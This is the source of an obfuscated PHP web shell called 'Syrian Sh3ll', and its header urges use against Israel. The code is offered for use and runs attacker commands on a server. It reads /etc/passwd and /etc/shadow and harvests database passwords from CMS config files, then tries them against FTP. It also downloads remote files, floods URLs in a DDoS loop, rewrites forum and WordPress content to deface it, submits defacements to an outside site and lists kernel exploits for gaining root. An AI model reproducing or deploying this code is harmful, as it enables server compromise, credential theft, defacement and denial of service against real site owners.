# ____ _ _ __ _ _ _ _ _ __ _ _ _
# /_ _ _|\ \ / /| |____ \| | / \ | |\ \ ||
# (_ _ \ \/ / | |____||| | / /\ \ | | \ \ ||
# \_ _ \ \ | | |____/ | | / /--\ \ | | \ \||
# __ _) | | | | | \ \ | | / /----\ \ | | \ \|
#|_ _ _/ |__| |_| \_\|_|/_/ \_\|_| \_|
# _ _ _ _ _ _
# /_ _ _| | | | | [ ~~Syrian Sh3ll~~ ] is a php evil script , please use it against ISRAEL Only .
# (___ | |__ ___| | | Coded By : EH << SyRiAn | 34G13 <~> sy34[at]msn[dot]com
# \___ \| _ \ / _ \ | | Note : I’m Proud to be ~~SyRiAn~~
# __ _)|| | | || __/ | | Copyright (C) 2010 – ~~ syrian-shell.com ~~
#|_ _ _/|_| |_|\___|_|_| Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ] .

$uselogin = 1; // Make It 0 If you Want To Disable Auth
$user = ‘root’; // Username
$pass = ‘toor’; // Password
$kHFd4g91d = ‘#990000′; // sh3ll Color
?>

if($_GET['id'] == 100) { echo "“; } else if($_GET['id'] == ‘Delete’) { Suicide(); }

function showUsers() { if($rows = Exe(‘cat /etc/passwd’)) { echo $rows; } elseif($rows= Exe(‘cat /etc/domainalias’)) { echo $rows; } elseif($rows= Exe(‘cat /etc/shadow’)) { echo $rows; } elseif($rows= Exe(‘cat /var/mail’)) { echo $rows; } elseif($rows= Exe(‘cat /etc/valiases’)) { echo $rows; } elseif(file_exists(‘/etc/passwd’)) { for($uid=0;$uid<60000;$uid++) { $ORA1cgP0A = posix_getpwuid($uid); if (!empty($ORA1cgP0A)) { while (list ($key, $mLGf5g22l) = each($ORA1cgP0A)) { print "$mLGf5g22l:"; } print "\n"; } } } else { echo "[-] \x43a\x6e'\164 \123\x68\157\167 Users :( ... S\x6fr\162\171 ";} } function ddos($url, $times, $wait) { for($i = 0;$i < $times;$i++) { sleep($wait); $oGq24gO8N = curl_init($url); curl_setopt($oGq24gO8N, CURLOPT_RETURNTRANSFER, 1); $do = curl_exec($oGq24gO8N); if($do) { echo "[+][$i] \101t\x74\x61\143k\145d :: $url\n"; curl_close($oGq24gO8N); } else { echo "[-][$i] \x45\162\x72\157\162 :: $url\n"; curl_close($oGq24gO8N); } flush(); } echo "[+]=- Don\x65! -=[+]\n"; } function KidcdgPR8($afSadgZf6) { if($afSadgZf6 == "L\x69nu\170") { $KidcdgPR8 = Exe('ls -lia'); } else if ($afSadgZf6 == "\127\x69\x6e\x64\157\167\x73") { $KidcdgPR8 = Exe('dir'); } if($KidcdgPR8) { echo $KidcdgPR8; } else if(function_exists('opendir')) { if ($asX63gCnE = opendir(getcwd())) { while (false !== ($file = readdir($asX63gCnE))) { echo "$file\n"; } while ($file = readdir($asX63gCnE)) { echo "$file\n"; } closedir($asX63gCnE); } } else { $d = dir(getcwd()); echo $d->asX63gCnE . “\n”; echo $d->path . “\n”; while (false !== ($entry = $d->read())) { echo $entry.”\n”; } $d->KMf27gmaG();
} } function fYZ4g87Nj() { $connect = mysql_connect($host,$user,$pass); mysql_select_db($dbName,$connect); if($ScriptType == ‘vb’) { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $host = $config['MasterServer']['servername']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; mysql_query(“U\x50\104\x41T\x45 $hZHc0gGVI S\105T \164\x65\x6d\160l\x61t\145 = ‘”.$XnP3g6CaJ.”‘ WHE\x52\105 t\151\164le =’\x66o\x72\x75m\x68\157m\145′”); } elseif($ScriptType == ‘wp’) { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; $eZaddg7ml = $prefix.”p\x6f\163\164s” ; mysql_query(“U\x50D\x41\124\x45 $eZaddg7ml \123ET p\157s\x74_\x74i\x74\x6c\x65 =’”.$XnP3g6CaJ.”‘ \x57\110\x45\122\105 I\x44 > 0 “); } } function mso60gm0z($fileURL) { $Nhte9gJi3 = Exe(‘get ‘.$fileURL); if(!$Nhte9gJi3) { $PrMe7gVsP = Exe(‘wget ‘.$fileURL); } elseif(!$PrMe7gVsP) { $Klfe8gHIl = Exe(‘curl -o ‘.$fileURL); } elseif(!$Klfe8gHIl) { $BaCebgIMA = Exe(‘lynx -source ‘.$fileURL); } } function OdO10gEiB($file) { $rzjacgJNV = @fopen($file,’r'); if(function_exists(‘fread’)) { echo fread($rzjacgJNV,100000); } elseif(function_exists(‘fgets’)) { echo fgets($rzjacgJNV); } elseif(function_exists(‘readfile’)) { echo readfile($rzjacgJNV); } elseif(function_exists(‘file_get_contents’)) { $qFfc6gCtd = @file_get_contents($file, NULL, NULL, 0, 1000000); var_dump($qFfc6gCtd); } elseif(function_exists(‘file’)) { $qFfc6gCtd = file($file); foreach ($qFfc6gCtd as $Knk90gqYU => $COlc7gmp0) { echo $COlc7gmp0 . ”
“; } } elseif(Exe(‘cat ‘.$file.”)) { echo Exe(‘cat ‘.$file.”); } elseif(function_exists(‘include’)) { include($file); } elseif(function_exists(‘copy’)) { $tmp=tempnam(”,’cx’); copy(‘compress.zlib://’.$file,$tmp); $nUR51gYtm=fopen($tmp,’r'); $data=fread($nUR51gYtm,filesize($tmp)); fclose($nUR51gYtm); echo $data; } elseif(function_exists(‘mb_send_mail’)) { if(file_exists(‘/tmp/mb_send_mail’)) { unlink(‘/tmp/mb_send_mail’); } @mb_send_mail(NULL, NULL, NULL, NULL,’-C $file -X /tmp/mb_send_mail’); @readfile(‘/tmp/mb_send_mail’); } else if(function_exists(‘curl_init’)) { $oGq24gO8N = curl_init(“\146i\x6c\145://”.$file.”\x00″.__FILE__); var_dump(curl_exec($oGq24gO8N));
} else if(is_object($YFKfegqpb=new COM(‘WScript.Shell’))) { echo $exec=EKP28gl0K(“type ‘$file’”,$YFKfegqpb); } else if(Ack26gU3s(‘win_shell_execute’)) { echo LXqfbgk8K(“type ‘$file’”); } else if(Ack26gU3s(‘win32_create_service’)) { echo hBad6gz6P(“type ‘$file’”); } else if(function_exists(‘imap_open’)) { $Aahd7g2SB=imap_open(‘/etc/passwd’,”,”); $list=imap_list($Aahd7g2SB,$file,’*'); for($i=0;$i— \123t\141\x72\x74 \106\151\154\x65 “.htmlspecialchars($file).”—\n”.htmlspecialchars($Yjde0g2P2).”\n— \x45\156\x64 \106il\x65″.htmlspecialchars($file).” —\n”; unlink($temp); echo “\106\x69\x6c\145″.htmlspecialchars($file).” ha\163 \142\145e\156 \x6c\157\141\144\145\144″; } else { echo htmlspecialchars($file).”d\x6fsen’\x74 \x65\x78\151\163\x74\163 or \171o\x75 \144\157\x6e’\164 \150\x61\x76\145 ac\143e\x73\163.”; } } elseif(substr(phpversion(),0,1) <'5') { echo "\x50l\145\141\163\145 Gen\x65\162\141\x74e i\x6e\x69.\160\150\x70 f\x69\x6c\145 \x61\x6e\x64 \x75\163\145 ?cmd=command"; } fclose($rzjacgJNV); } function Piq15gG3A($file) { $Rlg29gK4B=glob("$file*"); foreach ($Rlg29gK4B as $tKff4glb4) { echo "$tKff4glb4\n"; } if(function_exists('imap_open')) { $Aahd7g2SB=imap_open('/etc/passwd','',''); $s=explode("|",$file); if(count($s)>1) { $list=imap_list($Aahd7g2SB,trim($s[0]),trim($s[1])); } else { $list=imap_list($Aahd7g2SB,trim($Aahd7g2SB[0]),’*'); } for($i=0;$i $NOP2cgga6 =0 ; for($i=0;$i= 4) { break; } if($eDa42ghLl[$i] == ‘ ‘) { $NOP2cgga6++; } if($NOP2cgga6 == 3) { if($eDa42ghLl[$i] == ” “) {} else { $sNz43gE54 .= $eDa42ghLl[$i]; } } } return $sNz43gE54; } function VUo5cgiRH($login,$pass) { @$ftp=ftp_connect(’127.0.0.1′); if ($ftp) { @$bDpcagAUg=ftp_login($ftp,$login,$pass); if ($bDpcagAUg) { echo ‘[FTP] ‘.$login.’:’.$pass.” S\x75\x63\x63\145s\163\n”; } else ftp_quit($ftp); } } function tArc8gPm6($path,$username) { if ($asX63gCnE = opendir($path)) { while (false !== ($file = readdir($asX63gCnE))) { $RZR5agIdE=”$path$file”; if (($file!=’.') and ($file!=’..’)) { if (is_readable($RZR5agIdE)) { $BNd44gS7o=”$RZR5agIdE/”; if (is_dir($BNd44gS7o)) { tArc8gPm6($BNd44gS7o,$username); } else { if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’db_connect.php’)) { $pass=YYB62gTZD($RZR5agIdE); if ($pass!=”) { echo “[+] $RZR5agIdE\n$pass\n”; VUo5cgiRH($username,$pass); } } } } } } } } function YYB62gTZD($link) { @$config=fopen($link,’r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) { if (strrpos($line,’”‘)) $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,’”‘)-(strpos($line,’=')+3))); else $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,”‘”)-(strpos($line,’=')+3))); return $pass; } } } function FNGbgKPZ3() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip;
} function lEIabgVDO() { $lEIabgVDO = ini_get(“o\x70\145\x6e_\x62\x61\x73\145\x64ir”); if (!$lEIabgVDO) { $lEIabgVDO = ‘OFF‘; } else { $lEIabgVDO = ‘ON‘; } return $lEIabgVDO; } function oPHd8gEm1($GsOd9gTMs) { $KmR65g2ZE=”; for ($i=0; $i < strlen($GsOd9gTMs); $i++) { $KmR65g2ZE .= dechex(ord($GsOd9gTMs[$i])); } return $KmR65g2ZE; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = 'OFF‘; } else { $safe_mode = ‘ON‘; } return $safe_mode; } function pYJ33grm9() { $pYJ33grm9 = $_SERVER["\x53\103\122\111\120\x54_\x4e\101M\105"]; $pYJ33grm9 = Explode(‘/’, $pYJ33grm9); $pYJ33grm9 = $pYJ33grm9[count($pYJ33grm9) - 1]; return $pYJ33grm9; } function Suicide() { @unlink(pYJ33grm9()); } function sAjccgBXf() { $tKff4glb4=@php_uname(); $db=array(’2.6.17′=>’prctl3, raptor_prctl, py2′,’2.6.16′=>’raptor_prctl, exp.sh, raptor, raptor2, h00lyshit’,’2.6.15′=>’py2, exp.sh, raptor, raptor2, h00lyshit’,’2.6.14′=>’raptor, raptor2, h00lyshit’,’2.6.13′=>’kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit’,’2.6.12′=>’h00lyshit’,’2.6.11′=>’krad3, krad, h00lyshit’,’2.6.10′=>’h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2′,’2.6.9′=>’exp.sh, krad3, py2, prctl3, h00lyshit’,’2.6.8′=>’h00lyshit, krad, krad2′,’2.6.7′=>’h00lyshit, krad, krad2′,’2.6.6′=>’h00lyshit, krad, krad2′,’2.6.2′=>’h00lyshit, krad, mremap_pte’,’2.6.’=>’prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak’,’2.4.29′=>’elflbl, expand_stack, stackgrow2, uselib24, smpracer’,’2.4.27′=>’elfdump, uselib24′,’2.4.25′=>’uselib24′,’2.4.24′=>’mremap_pte, loko, uselib24′,’2.4.23′=>’mremap_pte, loko, uselib24′,’2.4.22′=>’loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod’,’2.4.21′=>’w00t, brk, uselib24, loginx, brk2, ptrace-kmod’,’2.4.20′=>’mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod’,’2.4.19′=>’newlocal, w00t, ave, uselib24, loginx, kmod’,’2.4.18′=>’km2, w00t, uselib24, loginx, kmod’,’2.4.17′=>’newlocal, w00t, uselib24, loginx, kmod’,’2.4.16′=>’w00t, uselib24, loginx’,’2.4.10′=>’w00t, brk, uselib24, loginx’,’2.4.9′=>’ptrace24, uselib24′,’2.4.’=>’kmdx, remap, pwned, ptrace_kmod, ong_bak’,’2.2.25′=>’mremap_pte’,’2.2.24′=>’ptrace’,’2.2.’=>’rip, ptrace’); foreach($db as $k=>$x)if(strstr($tKff4glb4,$k))return $x; if(!$ISLffggFD)$ISLffggFD=’Not found.‘; return $ISLffggFD; } function PostgreSQL() { if(@function_exists(‘pg_connect’)) { $postgreSQL = ‘ON‘; } else { $postgreSQL = ‘OFF‘; } return $postgreSQL; } function Oracle() { if(@function_exists(‘ocilogon’)) { $oracle = ‘ON‘; } else { $oracle = ‘OFF‘; } return $oracle; } function mEb17gi81($url, $hacker, $hackmode,$eZpcbgRfC, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,”\x64\x65\146\x61\x63e\x72=”.$hacker.”&\x64\157\x6d\x61\151\x6e\x31=”. $site.”&hackmode=”.$hackmode.”&\162\145as\157\156=”.$eZpcbgRfC); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $YAC8dgsIU = curl_exec($k); curl_close($k); return $YAC8dgsIU; } function MsSQL() { if(@function_exists(‘mssql_connect’)) { $msSQL = ‘ON‘; } else { $msSQL = ‘OFF‘;
} return $msSQL; } function VcDegoLHH() { $hNSa1g9lj = function_exists(‘mysql_connect’); if($hNSa1g9lj) { $mysql = ‘ON‘; } else { $mysql = ‘OFF‘; } return $mysql; } function VSn5fgzgV($ScriptType) { if($ScriptType == ‘vb’) {return “/\x69n\143lu\x64\145\163/config.php”;} elseif($ScriptType == ‘wp’) {return “/\x77p-config.\x70hp”;} elseif($ScriptType == ‘phpbb’) {return “/config.\x70\x68p”;} elseif($ScriptType == ‘jos’) {return “/co\x6ef\151\x67\165rat\x69\x6f\156.\160h\x70″;} elseif($ScriptType == ‘ipb’) {return “/c\157n\x66_\x67l\x6f\142\141\154.p\x68\x70″;} elseif($ScriptType == ‘smf’) {return “/\x53\145tt\151ng\163.\x70\x68\160 “;} elseif($ScriptType == ‘mybb’) {return “/\151\x6e\x63/config.\x70\x68\x70 “;} } function Gzip() { if (function_exists(‘gzencode’)) { $gzip = ‘ON‘; } else { $gzip = ‘OFF‘; } return $gzip; } function MysqlI() { if (function_exists(‘mysqli_connect’)) { $mysqli = ‘ON‘; } else { $mysqli = ‘OFF‘; } return $mysqli; } function MSQL() { if (function_exists(‘msql_connect’)) { $mSql = ‘ON‘; } else { $mSql = ‘OFF‘; } return $mSql; } function zZL12gCfO() { if (function_exists(‘sqlite_open’)) { $zZL12gCfO = ‘ON‘; } else { $zZL12gCfO = ‘OFF‘; } return $zZL12gCfO; } function FXdedgZi9($file,$text) { $jzTe1gPlC = gzinflate(base64_decode($text)); if($YEX55gtMn = @fopen($file,”\167″)) { @fputs($YEX55gtMn,$jzTe1gPlC); @fclose($file); } } function mtU11g8fs() { if(ini_get(‘register_globals’)) { $Aftc9geDH= ‘ON‘; } else { $Aftc9geDH= ‘OFF‘; } return $Aftc9geDH;
} function jTtcgMMUE($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . ” \x47\102″; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . ” \x4dB”; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . ” K\102″; } else { $size = $size . ” B”; } return $size; } function Curl() { if(extension_loaded(‘curl’)) { $curl = ‘ON‘; } else { $curl = ‘OFF‘; } return $curl; } function DecryptConfig() { if(file_exists(‘DecryptConfig.php’)) { @include(“DecryptConfig.\x70\150p”); if($_POST['ScriptType'] == ‘vb’) { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $sPF99gR0p = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == ‘wp’) { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == ‘jos’) { $dbName = $db; $prefix = $MIG3cgrYi; $email = $DeI96gMN4; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == ‘phpbb’) { $host = $zzP39gi0Z; $port = $bZH3bgEIm; $dbName = $dbname; $user = $Tgl3dgYTO; $pass = $nob3agmdG; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == ‘ipb’) { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == ‘smf’) { $dbName = $db_name; $pass = $kVs36gk_Z; $prefix = $nPk37gsn6; $host = $COV38gesi; $user = $db_user; $email = $hFKf8gLCc; } elseif($_POST['ScriptType'] == ‘mybb’) { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database'];
$prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ‘
#——————————-#
# Config Informations #
#——————————-#
Host : ‘.$host.’
DB Name : ‘.$dbName.’
DB User : ‘.$user.’
DB Pass : ‘.$pass.’
Prefix : ‘.$prefix.’
Email : ‘.$email.’
Port : ‘.$port.’
ACP : ‘.$admincp.’
MCP : ‘.$sPF99gR0p.’
‘; } else { echo “\106i\x6c\145 DecryptConfig.p\150p \x4e\157\164 E\170\151\163\164s !! “; } } function oIP58gX9b() { echo ‘

[TOP]

C0D3D By  ~~ [
EH SyRiAn_34G13 ] ~~ [
]
~~ [
www.syrian-shell.com ]



‘; } function CYjf9g5KD() { $fmqf0gshe=ini_get(‘upload_tmp_dir’); $uf=getenv(‘USERPROFILE’); $qoO19gAUz=getenv(‘ALLUSERSPROFILE’); $efGcegGik=ini_get(‘session.save_path’); $pJK4bgj3P=(getenv(‘TMP’))?getenv(‘TMP’):getenv(‘TEMP’); if(is_dir(‘/tmp’) && is_writable(‘/tmp’))return ‘/tmp’; if(is_dir(‘/usr/tmp’) && is_writable(‘/usr/tmp’))return ‘/usr/tmp’; if(is_dir(‘/var/tmp’) && is_writable(‘/var/tmp’))return ‘/var/tmp’; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($qoO19gAUz) && is_writable($qoO19gAUz))return $qoO19gAUz; if(is_dir($efGcegGik) && is_writable($efGcegGik))return $efGcegGik; if(is_dir($fmqf0gshe) && is_writable($fmqf0gshe))return $fmqf0gshe; if(is_dir($pJK4bgj3P) && is_writable($pJK4bgj3P))return $pJK4bgj3P; return ‘.’; } function LXqfbgk8K($command) { $name=CYjf9g5KD().”\\”.uniqid(‘NJ’); win_shell_execute(‘cmd.exe’,”,”/C $command >\”$name\”"); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo “[+] U\x70\x64\x61\164\x65 Has \x44\x30n3 ^_^”; } function hBad6gz6P($command) { $name=CYjf9g5KD().”\\”.uniqid(‘NJ’); $n=uniqid(‘NJ’); $cmd=(empty($_SERVER['ComSpec']))?’d:\\windows\\system32\\cmd.exe’:$_SERVER['ComSpec']; win32_create_service(array(‘service’=>$n,’display’=>$n,’path’=>$cmd,’params’=>”/\143 $command >\”$name\”")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function LNe50gZ9q($command) { $name=CYjf9g5KD().”\\”.uniqid(‘NJ’); $bMB1bg2r3=new ffi(“[\154\x69\142='k\x65r\x6e\145\x6c\x33\x32.dl\154'] i\x6et WinExec(char *A\x50\x50,\151\156\164 S\127);”); $bDpcagAUg=$bMB1bg2r3->WinExec(“cmd.exe /c $command >\”$name\”",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function EKP28gl0K($command,$YFKfegqpb) { $exec=$YFKfegqpb->exec(“cmd.exe /\143 $command”); $so=$exec->LPV14gp9V(); return $so->poGfgcg4G(); } function Xzbb4ghA3($command) { $perl=new perl(); ob_start(); $perl->eval(“\x73yste\x6d(‘”.$command.”‘)”); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=”; $XTh3egrXc[]=array(‘pipe’,'r’);$XTh3egrXc[]=array(‘pipe’,'w’); if(function_exists(‘passthru’)){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists(‘system’)){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists(‘exec’)){@exec($command,$output);$output=join(“\n”,$output);$exec=$output;} elseif(function_exists(‘shell_exec’))$exec=@shell_exec($command); elseif(function_exists(‘popen’)){$output=@popen($command,’r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists(‘proc_open’)){$bDpcagAUg=@proc_open($command,$XTh3egrXc,$XIUb8ggfH);while(!feof($XIUb8ggfH[1])){$line=fgets($XIUb8ggfH[1]);$output.=$line;}$exec=$output;proc_close($bDpcagAUg);} elseif(function_exists(‘win_shell_execute’))$exec=LXqfbgk8K($command); elseif(function_exists(‘win32_create_service’))$exec=hBad6gz6P($command); elseif(extension_loaded(‘ffi’) && $windows)$exec=LNe50gZ9q($command); elseif(extension_loaded(‘perl’))$exec=Xzbb4ghA3($command);
return $exec; } function OZK95glUK() { if(function_exists(‘get_magic_quotes_gpc’)) { $nMU94gPBk = get_magic_quotes_gpc(); } if (empty($nMU94gPBk)) { $nMU94gPBk = ‘OFF‘; } else { $nMU94gPBk= ‘ON‘; } return $nMU94gPBk; } function DisableFunctions() { $SZP40gkZJ = ini_get(‘disable_functions’); if (empty($SZP40gkZJ)) { $SZP40gkZJ = ‘NONE‘; } return $SZP40gkZJ; } function bAN13g609($afSadgZf6) { if($afSadgZf6 == ‘Windows’) { echo ”


“; } else { echo ”
<\x73\145le\143t name=alias >


“; } } function fYUag2UGE($name,$content) { $file = @fopen($name,”w+”); @fwrite($file,$content); @fclose($file); return true; } function which($DGebdgNNt) { $path = Exe(“which $DGebdgNNt”); if(!empty($path)) { return trim($path); } else { return trim($DGebdgNNt); } } function Ack26gU3s($Bjr5egbgh) { global $disablefunctions,$safemode; $safe=array(‘passthru’,'system’,'exec’,'exec’,'shell_exec’,'popen’,'proc_open’); if($safemode==’ON’ && in_array($Bjr5egbgh,$safe))return 0; elseif(function_exists($Bjr5egbgh) && is_callable($Bjr5egbgh) && !strstr($disablefunctions,$Bjr5egbgh))return 1; return 0; } function CSS($kHFd4g91d) { $css = ”
<\x68tm\154 \x64\x69\162=rt\154>

S\171\122\151\x41n \x53\x68\x33\x6c\154 ~ \126\x34~ [ \1023 \103\16234\x54!\x56\063 \x4fr D!3 \x54R\171!\156G ]

<\x6d\145\164\141 \150\x74\x74p-e\x71\x75i\166=C\157\156ten\x74-\x54\x79\x70\x65 content=text/\150t\x6d\x6c; ch\141\x72\163\145\164=windows-1256>
<\163t\x79l\145>
B\x4f\x44Y
{
\x46\x4fNT-F\101\x4d\x49\x4c\131: V\145\x72\x64a\156a;
ma\162gi\156: 2;
\x63\x6f\x6c\157\162: #c\143\143\x63\x63\x63;
\142\x61\143\153\x67r\x6f\x75n\144-\x63\x6f\154\157r: #000000;
}
\163\x79
{
\143\x6f\154\x6f\x72:”.$kHFd4g91d.”;
\146\157n\164-size:7\x70t;
\x66\x6fn\x74-\167ei\x67h\164: \142ol\x64;
}
#\102\x6f\x78
{
c\x6f\x6c\x6f\x72:”.$kHFd4g91d.”;
\x66\x6fn\x74-size:14\160x;
b\x61\143\153\147\x72o\165n\x64-\x63\x6f\154\x6f\162:#000;
\x66\157n\x74-\x77\x65\151\147\x68\164:\x62o\154\144;
}
\x74r
{
\102\x4f\x52\104ER-RI\x47H\x54: #\x63ccc\143c 1\x70\170 so\154id;
\x42\117\122\x44\105R-T\117\120: #c\x63\143c\x63c 1px s\157\x6c\x69\x64;
\102\x4f\122\x44E\122-L\105\x46\x54: #\x63\x63c\x63\143c 1\160\170 \x73\x6fl\x69d;
B\117R\104E\x52-BO\124\124\x4f\x4d: #c\143\x63c\x63\143 1\160\170 \x73\x6f\154\151\x64;
c\x6fl\157\162: #f\x66ff\x66\x66;
}
\164\144
{
\102\x4f\122\104\x45\x52-\122\111\x47\x48\x54: #\x63\x63c\x63\143\x63 1\x70\170 \x73\x6f\x6c\x69\x64;
\102ORD\x45\x52-T\x4fP: #\143c\143\143cc 1p\170 \x73oli\144;
B\x4f\x52D\x45\x52-\x4cE\x46T: #cc\x63\143\143\x63 1px so\154\151d;
\x42\x4f\122\x44\x45R-BO\x54\124\117\x4d: #c\x63cc\143\143 1\x70\170 s\x6f\154\x69\x64;
c\157\154o\162: #\143\143\x63\x63\x63c;
}
.\164\x61\x62\x6ce\x31
{
\x42\x4f\x52\x44\105R: 1\160x n\x6fn\145;
\102\101\x43\x4b\107RO\x55\x4e\x44-\103O\114\x4f\122: #000000;
\143\157l\157\162: #333333
}
.\164\x64\x31
{
\x42\117\122\104\105\x52: 1\x70\x78 \x6eo\x6ee;
c\157\x6co\x72: #\x66\146fff\x66; \x66o\156\164-s\164y\x6c\145:n\x6fr\x6dal;
\146o\156\x74-\x76\x61ri\x61\156\164:\x6e\157\162m\x61\x6c;
\x66\x6f\x6e\x74-w\x65\151\147h\x74:\156\x6f\162\x6dal;
f\157\156t-size:7\x70t;
\146\x6fn\164-\146ami\154y:\x74\x61\150\157m\141
}
.\x74r\x31
{
\x42\x4f\x52\x44ER: 1\x70x n\157n\145;
\x63o\154\157r: #\x63c\143\x63\x63\143;
}
\164\141\142l\145
{
\x42\x4f\x52D\105R: #ee\145eee out\x73\145\x74;
\102\x41\103\x4b\107\122\x4f\125\x4e\104-C\x4f\x4c\117R: #000000;
\143ol\x6f\162: #c\143\143cc\143;
}
input
{
BORD\x45R-\x52I\107\x48\x54: “.$kHFd4g91d.” 1px s\157\x6c\x69\x64;
\102OR\x44\x45\x52-\x54O\x50: “.$kHFd4g91d.” 1\x70\170 s\x6f\154\151\144;
\x42\x4fR\x44\x45R-LE\106T: “.$kHFd4g91d.” 1px s\157\x6c\151d;
BO\x52DE\122-BO\124T\x4f\x4d: “.$kHFd4g91d.” 1\x70\x78 \x73\157l\151\x64;
\x42AC\113G\x52\x4fUN\104-\x43\117L\117R: #333333;
f\x6f\156\164: 9\160\164 \x74\141\150o\x6da;
\x63\x6f\x6cor: #f\146\x66f\x66f;
}
\x73el\145\143t
{
B\x4f\x52DE\122-\x52IG\x48T: #f\x66\146\146\146\x66 1\160x so\x6c\x69\x64;
\x42\117\x52\104\x45R-\124OP: #999999 1px \163\157li\144;
B\x4fR\x44E\x52-L\105FT: #999999 1\160\x78 \163o\154\151\x64;
BO\122\x44\105\x52-BOTT\117\x4d: #\146\x66\x66\146\x66f 1\160\x78 \x73ol\151\x64;
\102AC\113\107\122\117U\116D-\x43\x4f\114\117\x52: #000000;
\146\x6f\x6et: 9p\164 \164a\150o\155\x61;
c\157l\157\162: #\103\103\103C\103\103;;
}
submit
{
\x42\x4fR\104\x45\x52: 1px o\165\164s\145\x74 \142\x75\164t\x6f\x6e\x68ig\150\x6c\x69g\x68\x74;
\102A\103K\107\122\x4fU\x4eD-C\117L\117R: #272727;
\167\x69\x64\x74\x68: 40%;
\143\x6f\x6co\x72: #\143\x63\x63c\143c;
}
\164\x65x\x74\141\162\145\x61
{
\102\x4f\x52\x44\x45\x52-\122\x49\x47H\124: #\146\x66\x66f\146\x66 1\160\x78 \x73\x6f\x6c\151d;
\102\x4fRD\x45\122-T\x4f\x50: #999999 1\x70\x78 s\x6f\154\151\144;
B\x4f\x52\x44\x45\x52-LEF\x54: #999999 1\160x \163o\154i\144;
B\117\122\104\x45R-\x42O\124TOM: #\146\x66\x66f\x66f 1p\170 \163oli\x64;
BA\103K\x47\x52OU\x4e\104-\103\x4f\114\x4f\122: #333333;
\143\x6f\x6c\157\x72: #\146\146\x66\146\x66f;
}
A:l\151\x6ek {\103O\x4c\117\x52:”.$kHFd4g91d.”; T\x45\130T-\104\x45\x43\117\x52A\124\x49\117\x4e: no\156\x65}
\x41:\166\x69s\151\164\145\x64 { \x43O\114OR:”.$kHFd4g91d.”; \124E\x58T-\104\x45C\117\x52\101\x54\x49\x4f\x4e: \156\157\x6e\145}
\101:a\143\164\151\x76\145 {\103\x4f\114\x4fR:”.$kHFd4g91d.”; T\x45X\x54-\104E\103\x4fR\101\x54\x49\x4fN: \156o\x6ee}
A:\150\x6f\166e\x72 {\x63\157\x6c\x6f\162:\142\x6c\165e;TE\x58T-\104\105\103\x4fR\x41\124\111\117\116: \156\157\x6ee}

<\x73c\x72i\x70t>
\146\x75\156\143t\x69\157\x6e Suicide()
{
\166\x61\162 \x63\157\156f\x69\162\x6d\123ui\143\151de = \x63\157\x6e\x66i\x72\155(‘A\x72\145 \131ou \123u\162\x65 \131\157\x75 W\x61\156na \104\145\x6c\145\164\145 \164h\145 S\150\x65\x6c\x6c ?’);
\151f(c\x6f\x6e\146\x69\162\155S\x75\x69c\151\x64e == \x74\162\165\145)
{
\x64\157\x63\165\155\145nt.l\157\x63at\151\157\x6e=’”.pYJ33grm9().”?i\x64=\x44\145\154\145\164\x65′;
}
\x65l\163e
{
